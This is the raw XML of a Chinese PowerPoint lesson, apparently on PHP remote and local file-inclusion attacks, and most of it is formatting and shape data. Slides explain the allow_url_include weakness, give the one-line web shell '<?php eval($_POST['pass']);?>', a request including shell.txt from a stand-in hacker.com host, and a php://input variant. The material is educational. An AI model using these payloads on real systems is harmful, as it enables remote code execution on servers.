                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>包含</a:t>
                </a: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攻击者服务器上的恶意</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>文件</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2400" b="1"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由于</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>allow_url_fopen</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与 </a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>allow_url_include</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是开启的，攻击者可以</a:t>
                </a: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将包含恶意代码的文件放在自己的服务器上</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，例如一个内容为</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&lt;?</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>php</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zh-CN" sz="2400" dirty="0" err="1">
                    <a:solidFill>
                      <a:schemeClr val="tx1">
                        <a:lumMod val="75000"/>
                        <a:lumOff val="25000"/>
                      </a:schemeClr>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>eval</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($_POST[‘pass’]);?&gt;</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的</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shell.txt</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文件，构造恶意请求</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http://www.victim.com/index.php</a:t>
                </a:r>
                <a:r>
                  <a:rPr lang="en-US" altLang="zh-CN" sz="2400" b="1" dirty="0">
                    <a:solidFill>
                      <a:srgbClr val="FF0000"/>
                    </a:solidFill>
                    <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                    <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  </a:rPr>
                  <a:t>?func=http://www.hacker.com/shell.txt</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shell.txt</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中的恶意代码就会在目标服务器上执行。</a:t>
                </a:r>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="12" name="直接连接符 11">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4EE5C163-DF6A-4DD9-93AA-5327245FECE7}"/>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9" name="laptop_302338">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" xmlns="" id="{4A2842F4-76B0-45E9-870E-1694150CCB65}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeAspect="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2666029" y="3195948"/>
              <a:ext cx="609685" cy="446413"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 20293 w 607639"/>
                <a:gd name="connsiteY0" fmla="*/ 404476 h 444915"/>
                <a:gd name="connsiteX1" fmla="*/ 20293 w 607639"/>
                <a:gd name="connsiteY1" fmla="*/ 424740 h 444915"/>
                <a:gd name="connsiteX2" fmla="*/ 587346 w 607639"/>
                <a:gd name="connsiteY2" fmla="*/ 424740 h 444915"/>
                <a:gd name="connsiteX3" fmla="*/ 587346 w 607639"/>
                <a:gd name="connsiteY3" fmla="*/ 404476 h 444915"/>
                <a:gd name="connsiteX4" fmla="*/ 369550 w 607639"/>
                <a:gd name="connsiteY4" fmla="*/ 404476 h 444915"/>
                <a:gd name="connsiteX5" fmla="*/ 349346 w 607639"/>
                <a:gd name="connsiteY5" fmla="*/ 414608 h 444915"/>
                <a:gd name="connsiteX6" fmla="*/ 268351 w 607639"/>
                <a:gd name="connsiteY6" fmla="*/ 414608 h 444915"/>
                <a:gd name="connsiteX7" fmla="*/ 248147 w 607639"/>
                <a:gd name="connsiteY7" fmla="*/ 404476 h 444915"/>
                <a:gd name="connsiteX8" fmla="*/ 394884 w 607639"/>
                <a:gd name="connsiteY8" fmla="*/ 171897 h 444915"/>
                <a:gd name="connsiteX9" fmla="*/ 407631 w 607639"/>
                <a:gd name="connsiteY9" fmla="*/ 171897 h 444915"/>
                <a:gd name="connsiteX10" fmla="*/ 420288 w 607639"/>
                <a:gd name="connsiteY10" fmla="*/ 184608 h 444915"/>
                <a:gd name="connsiteX11" fmla="*/ 407631 w 607639"/>
                <a:gd name="connsiteY11" fmla="*/ 197230 h 444915"/>
                <a:gd name="connsiteX12" fmla="*/ 394884 w 607639"/>
                <a:gd name="connsiteY12" fmla="*/ 197230 h 444915"/>
                <a:gd name="connsiteX13" fmla="*/ 192432 w 607639"/>
                <a:gd name="connsiteY13" fmla="*/ 171897 h 444915"/>
                <a:gd name="connsiteX14" fmla="*/ 205063 w 607639"/>
                <a:gd name="connsiteY14" fmla="*/ 171897 h 444915"/>
                <a:gd name="connsiteX15" fmla="*/ 217694 w 607639"/>
                <a:gd name="connsiteY15" fmla="*/ 184608 h 444915"/>
                <a:gd name="connsiteX16" fmla="*/ 205063 w 607639"/>
                <a:gd name="connsiteY16" fmla="*/ 197230 h 444915"/>
                <a:gd name="connsiteX17" fmla="*/ 192432 w 607639"/>
                <a:gd name="connsiteY17" fmla="*/ 197230 h 444915"/>
                <a:gd name="connsiteX18" fmla="*/ 384866 w 607639"/>
                <a:gd name="connsiteY18" fmla="*/ 151702 h 444915"/>
                <a:gd name="connsiteX19" fmla="*/ 374720 w 607639"/>
                <a:gd name="connsiteY19" fmla="*/ 161834 h 444915"/>
                <a:gd name="connsiteX20" fmla="*/ 374720 w 607639"/>
                <a:gd name="connsiteY20" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX21" fmla="*/ 384866 w 607639"/>
                <a:gd name="connsiteY21" fmla="*/ 252850 h 444915"/>
                <a:gd name="connsiteX22" fmla="*/ 394923 w 607639"/>
                <a:gd name="connsiteY22" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX23" fmla="*/ 394923 w 607639"/>
                <a:gd name="connsiteY23" fmla="*/ 217386 h 444915"/>
                <a:gd name="connsiteX24" fmla="*/ 407651 w 607639"/>
                <a:gd name="connsiteY24" fmla="*/ 217386 h 444915"/>
                <a:gd name="connsiteX25" fmla="*/ 440493 w 607639"/>
                <a:gd name="connsiteY25" fmla="*/ 184588 h 444915"/>
                <a:gd name="connsiteX26" fmla="*/ 407651 w 607639"/>
                <a:gd name="connsiteY26" fmla="*/ 151702 h 444915"/>
                <a:gd name="connsiteX27" fmla="*/ 273434 w 607639"/>
                <a:gd name="connsiteY27" fmla="*/ 151702 h 444915"/>
                <a:gd name="connsiteX28" fmla="*/ 263288 w 607639"/>
                <a:gd name="connsiteY28" fmla="*/ 161834 h 444915"/>
                <a:gd name="connsiteX29" fmla="*/ 263288 w 607639"/>
                <a:gd name="connsiteY29" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX30" fmla="*/ 273434 w 607639"/>
                <a:gd name="connsiteY30" fmla="*/ 252850 h 444915"/>
                <a:gd name="connsiteX31" fmla="*/ 283580 w 607639"/>
                <a:gd name="connsiteY31" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX32" fmla="*/ 283580 w 607639"/>
                <a:gd name="connsiteY32" fmla="*/ 212408 h 444915"/>
                <a:gd name="connsiteX33" fmla="*/ 324077 w 607639"/>
                <a:gd name="connsiteY33" fmla="*/ 212408 h 444915"/>
                <a:gd name="connsiteX34" fmla="*/ 324077 w 607639"/>
                <a:gd name="connsiteY34" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX35" fmla="*/ 334223 w 607639"/>
                <a:gd name="connsiteY35" fmla="*/ 252850 h 444915"/>
                <a:gd name="connsiteX36" fmla="*/ 344281 w 607639"/>
                <a:gd name="connsiteY36" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX37" fmla="*/ 344281 w 607639"/>
                <a:gd name="connsiteY37" fmla="*/ 161834 h 444915"/>
                <a:gd name="connsiteX38" fmla="*/ 334223 w 607639"/>
                <a:gd name="connsiteY38" fmla="*/ 151702 h 444915"/>
                <a:gd name="connsiteX39" fmla="*/ 324077 w 607639"/>
                <a:gd name="connsiteY39" fmla="*/ 161834 h 444915"/>
                <a:gd name="connsiteX40" fmla="*/ 324077 w 607639"/>
                <a:gd name="connsiteY40" fmla="*/ 192143 h 444915"/>
                <a:gd name="connsiteX41" fmla="*/ 283580 w 607639"/>
                <a:gd name="connsiteY41" fmla="*/ 192143 h 444915"/>
                <a:gd name="connsiteX42" fmla="*/ 283580 w 607639"/>
                <a:gd name="connsiteY42" fmla="*/ 161834 h 444915"/>
                <a:gd name="connsiteX43" fmla="*/ 273434 w 607639"/>
                <a:gd name="connsiteY43" fmla="*/ 151702 h 444915"/>
                <a:gd name="connsiteX44" fmla="*/ 182295 w 607639"/>
                <a:gd name="connsiteY44" fmla="*/ 151702 h 444915"/>
                <a:gd name="connsiteX45" fmla="*/ 172148 w 607639"/>
                <a:gd name="connsiteY45" fmla="*/ 161834 h 444915"/>
                <a:gd name="connsiteX46" fmla="*/ 172148 w 607639"/>
                <a:gd name="connsiteY46" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX47" fmla="*/ 182295 w 607639"/>
                <a:gd name="connsiteY47" fmla="*/ 252850 h 444915"/>
                <a:gd name="connsiteX48" fmla="*/ 192441 w 607639"/>
                <a:gd name="connsiteY48" fmla="*/ 242717 h 444915"/>
                <a:gd name="connsiteX49" fmla="*/ 192441 w 607639"/>
                <a:gd name="connsiteY49" fmla="*/ 217386 h 444915"/>
                <a:gd name="connsiteX50" fmla="*/ 205080 w 607639"/>
                <a:gd name="connsiteY50" fmla="*/ 217386 h 444915"/>
                <a:gd name="connsiteX51" fmla="*/ 238011 w 607639"/>
                <a:gd name="connsiteY51" fmla="*/ 184588 h 444915"/>
                <a:gd name="connsiteX52" fmla="*/ 205080 w 607639"/>
                <a:gd name="connsiteY52" fmla="*/ 151702 h 444915"/>
                <a:gd name="connsiteX53" fmla="*/ 81009 w 607639"/>
                <a:gd name="connsiteY53" fmla="*/ 60686 h 444915"/>
                <a:gd name="connsiteX54" fmla="*/ 526559 w 607639"/>
                <a:gd name="connsiteY54" fmla="*/ 60686 h 444915"/>
                <a:gd name="connsiteX55" fmla="*/ 526559 w 607639"/>
                <a:gd name="connsiteY55" fmla="*/ 343865 h 444915"/>
                <a:gd name="connsiteX56" fmla="*/ 81009 w 607639"/>
                <a:gd name="connsiteY56" fmla="*/ 343865 h 444915"/>
                <a:gd name="connsiteX57" fmla="*/ 70848 w 607639"/>
                <a:gd name="connsiteY57" fmla="*/ 40438 h 444915"/>
                <a:gd name="connsiteX58" fmla="*/ 60790 w 607639"/>
                <a:gd name="connsiteY58" fmla="*/ 50570 h 444915"/>
                <a:gd name="connsiteX59" fmla="*/ 60790 w 607639"/>
                <a:gd name="connsiteY59" fmla="*/ 353906 h 444915"/>
                <a:gd name="connsiteX60" fmla="*/ 70848 w 607639"/>
                <a:gd name="connsiteY60" fmla="*/ 364038 h 444915"/>
                <a:gd name="connsiteX61" fmla="*/ 536702 w 607639"/>
                <a:gd name="connsiteY61" fmla="*/ 364038 h 444915"/>
                <a:gd name="connsiteX62" fmla="*/ 546849 w 607639"/>
                <a:gd name="connsiteY62" fmla="*/ 353906 h 444915"/>
                <a:gd name="connsiteX63" fmla="*/ 546849 w 607639"/>
                <a:gd name="connsiteY63" fmla="*/ 50570 h 444915"/>
                <a:gd name="connsiteX64" fmla="*/ 536702 w 607639"/>
                <a:gd name="connsiteY64" fmla="*/ 40438 h 444915"/>
                <a:gd name="connsiteX65" fmla="*/ 60790 w 607639"/>
                <a:gd name="connsiteY65" fmla="*/ 0 h 444915"/>
                <a:gd name="connsiteX66" fmla="*/ 546849 w 607639"/>
                <a:gd name="connsiteY66" fmla="*/ 0 h 444915"/>
                <a:gd name="connsiteX67" fmla="*/ 587346 w 607639"/>
                <a:gd name="connsiteY67" fmla="*/ 40438 h 444915"/>
                <a:gd name="connsiteX68" fmla="*/ 587346 w 607639"/>
                <a:gd name="connsiteY68" fmla="*/ 384302 h 444915"/>
                <a:gd name="connsiteX69" fmla="*/ 591618 w 607639"/>
                <a:gd name="connsiteY69" fmla="*/ 384302 h 444915"/>
                <a:gd name="connsiteX70" fmla="*/ 607639 w 607639"/>
                <a:gd name="connsiteY70" fmla="*/ 400210 h 444915"/>
                <a:gd name="connsiteX71" fmla="*/ 607639 w 607639"/>
                <a:gd name="connsiteY71" fmla="*/ 429006 h 444915"/>
                <a:gd name="connsiteX72" fmla="*/ 591618 w 607639"/>
                <a:gd name="connsiteY72" fmla="*/ 444915 h 444915"/>
                <a:gd name="connsiteX73" fmla="*/ 16021 w 607639"/>
                <a:gd name="connsiteY73" fmla="*/ 444915 h 444915"/>
                <a:gd name="connsiteX74" fmla="*/ 0 w 607639"/>
                <a:gd name="connsiteY74" fmla="*/ 429006 h 444915"/>
                <a:gd name="connsiteX75" fmla="*/ 0 w 607639"/>
                <a:gd name="connsiteY75" fmla="*/ 400210 h 444915"/>
                <a:gd name="connsiteX76" fmla="*/ 16021 w 607639"/>
                <a:gd name="connsiteY76" fmla="*/ 384302 h 444915"/>
                <a:gd name="connsiteX77" fmla="*/ 20293 w 607639"/>
                <a:gd name="connsiteY77" fmla="*/ 384302 h 444915"/>
                <a:gd name="connsiteX78" fmla="*/ 20293 w 607639"/>
                <a:gd name="connsiteY78" fmla="*/ 40438 h 444915"/>
                <a:gd name="connsiteX79" fmla="*/ 60790 w 607639"/>
                <a:gd name="connsiteY79" fmla="*/ 0 h 444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607639" h="444915">
                  <a:moveTo>
                    <a:pt x="20293" y="404476"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20293" y="424740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587346" y="424740"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="587346" y="404476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="369550" y="404476"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="364833" y="410787"/>
                    <a:pt x="357445" y="414608"/>
                    <a:pt x="349346" y="414608"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="268351" y="414608"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="260341" y="414608"/>
                    <a:pt x="252864" y="410787"/>
                    <a:pt x="248147" y="404476"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="394884" y="171897"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="407631" y="171897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="414583" y="171897"/>
                    <a:pt x="420288" y="177586"/>
                    <a:pt x="420288" y="184608"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="420288" y="191541"/>
                    <a:pt x="414583" y="197230"/>
                    <a:pt x="407631" y="197230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="394884" y="197230"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="192432" y="171897"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="205063" y="171897"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="212001" y="171897"/>
                    <a:pt x="217694" y="177586"/>
                    <a:pt x="217694" y="184608"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217694" y="191541"/>
                    <a:pt x="212001" y="197230"/>
                    <a:pt x="205063" y="197230"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="192432" y="197230"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="384866" y="151702"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="379259" y="151702"/>
                    <a:pt x="374720" y="156235"/>
                    <a:pt x="374720" y="161834"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="374720" y="242717"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="374720" y="248317"/>
                    <a:pt x="379259" y="252850"/>
                    <a:pt x="384866" y="252850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="390384" y="252850"/>
                    <a:pt x="394923" y="248317"/>
                    <a:pt x="394923" y="242717"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="394923" y="217386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="407651" y="217386"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="425719" y="217386"/>
                    <a:pt x="440493" y="202720"/>
                    <a:pt x="440493" y="184588"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="440493" y="166456"/>
                    <a:pt x="425719" y="151702"/>
                    <a:pt x="407651" y="151702"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="273434" y="151702"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="267827" y="151702"/>
                    <a:pt x="263288" y="156235"/>
                    <a:pt x="263288" y="161834"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="263288" y="242717"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="263288" y="248317"/>
                    <a:pt x="267827" y="252850"/>
                    <a:pt x="273434" y="252850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="279041" y="252850"/>
                    <a:pt x="283580" y="248317"/>
                    <a:pt x="283580" y="242717"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="283580" y="212408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324077" y="212408"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="324077" y="242717"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="324077" y="248317"/>
                    <a:pt x="328616" y="252850"/>
                    <a:pt x="334223" y="252850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="339741" y="252850"/>
                    <a:pt x="344281" y="248317"/>
                    <a:pt x="344281" y="242717"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="344281" y="161834"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="344281" y="156235"/>
                    <a:pt x="339741" y="151702"/>
                    <a:pt x="334223" y="151702"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="328616" y="151702"/>
                    <a:pt x="324077" y="156235"/>
                    <a:pt x="324077" y="161834"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="324077" y="192143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283580" y="192143"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="283580" y="161834"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="283580" y="156235"/>
                    <a:pt x="279041" y="151702"/>
                    <a:pt x="273434" y="151702"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="182295" y="151702"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="176688" y="151702"/>
                    <a:pt x="172148" y="156235"/>
                    <a:pt x="172148" y="161834"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="172148" y="242717"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="172148" y="248317"/>
                    <a:pt x="176688" y="252850"/>
                    <a:pt x="182295" y="252850"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="187902" y="252850"/>
                    <a:pt x="192441" y="248317"/>
                    <a:pt x="192441" y="242717"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="192441" y="217386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="205080" y="217386"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="223236" y="217386"/>
                    <a:pt x="238011" y="202720"/>
                    <a:pt x="238011" y="184588"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="238011" y="166456"/>
                    <a:pt x="223236" y="151702"/>
                    <a:pt x="205080" y="151702"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="81009" y="60686"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="526559" y="60686"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="526559" y="343865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81009" y="343865"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="70848" y="40438"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="65330" y="40438"/>
                    <a:pt x="60790" y="44971"/>
                    <a:pt x="60790" y="50570"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="60790" y="353906"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="60790" y="359505"/>
                    <a:pt x="65330" y="364038"/>
                    <a:pt x="70848" y="364038"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="536702" y="364038"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="542309" y="364038"/>
                    <a:pt x="546849" y="359505"/>
                    <a:pt x="546849" y="353906"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="546849" y="50570"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="546849" y="44971"/>
                    <a:pt x="542309" y="40438"/>
                    <a:pt x="536702" y="40438"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="60790" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="546849" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="569189" y="0"/>
                    <a:pt x="587346" y="18131"/>
                    <a:pt x="587346" y="40438"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="587346" y="384302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="591618" y="384302"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="600430" y="384302"/>
                    <a:pt x="607639" y="391412"/>
                    <a:pt x="607639" y="400210"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="607639" y="429006"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="607639" y="437805"/>
                    <a:pt x="600430" y="444915"/>
                    <a:pt x="591618" y="444915"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="16021" y="444915"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="7209" y="444915"/>
                    <a:pt x="0" y="437805"/>
                    <a:pt x="0" y="429006"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="400210"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="391412"/>
                    <a:pt x="7209" y="384302"/>
                    <a:pt x="16021" y="384302"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20293" y="384302"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20293" y="40438"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="20293" y="18131"/>
                    <a:pt x="38450" y="0"/>
                    <a:pt x="60790" y="0"/>
                  </a:cubicBezTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:schemeClr val="bg1"/>
            </a:solidFill>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="232644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1244304" y="1368381"/>
            <a:ext cx="10657184" cy="394996"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="86376" tIns="43188" rIns="86376" bIns="43188" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="just"/>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例如</a:t>
            </a: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在下面这个</a:t>
            </a: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数据包中，</a:t>
            </a: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2000" dirty="0" err="1">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php</a:t>
            </a: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err="1">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eval</a:t>
            </a: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($_POST[‘pass’]);?&gt;</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就是</a:t>
            </a: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php://input</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所获取到的内容。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="102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767" y="2320181"/>
            <a:ext cx="11134448" cy="38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3600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3" presetClass="entr" presetSubtype="1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blinds(horizontal)">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UUID" val="{C1A8F295-47DC-48FB-81BD-666766343352}"/>
  <p:tag name="ISPRING_RESOURCE_FOLDER" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369\"/>
  <p:tag name="ISPRING_PRESENTATION_PATH" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369.pptx"/>
  <p:tag name="ISPRING_PROJECT_FOLDER_UPDATED" val="1"/>
  <p:tag name="ISPRING_SCREEN_RECS_UPDATED" val="E:\素材\正版图-卖\PPT\0变色龙\0包图网\bt369\ppt\bt369"/>
  <p:tag name="ISPRING_SCORM_ENDPOINT" val="&lt;endpoint&gt;&lt;enable&gt;0&lt;/enable&gt;&lt;lrs&gt;http://&lt;/lrs&gt;&lt;auth&gt;0&lt;/auth&gt;&lt;login&gt;&lt;/login&gt;&lt;password&gt;&lt;/password&gt;&lt;key&gt;&lt;/key&gt;&lt;name&gt;&lt;/name&gt;&lt;email&gt;&lt;/email&gt;&lt;/endpoint&gt;&#10;"/>
  <p:tag name="ISPRING_PRESENTATION_TITLE" val="bt1191"/>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Office Theme">
  <a:themeElements>
    <a:clrScheme name="自定义 386">
      <a:dk1>
        <a:sysClr val="windowText" lastClr="000000"/>
      </a:dk1>
      <a:lt1>
        <a:sysClr val="window" lastClr="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="29ABE2"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="29ABE2"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="C8C8C8"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="29ABE2"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="C8C8C8"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="29ABE2"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="C8C8C8"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="29ABE2"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="C8C8C8"/>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3322</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>自定义</PresentationFormat>
  <Paragraphs>342</Paragraphs>
  <Slides>34</Slides>
  <Notes>33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34</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="43" baseType="lpstr">
      <vt:lpstr>Microsoft Yahei</vt:lpstr>
      <vt:lpstr>宋体</vt:lpstr>
      <vt:lpstr>微软雅黑</vt:lpstr>
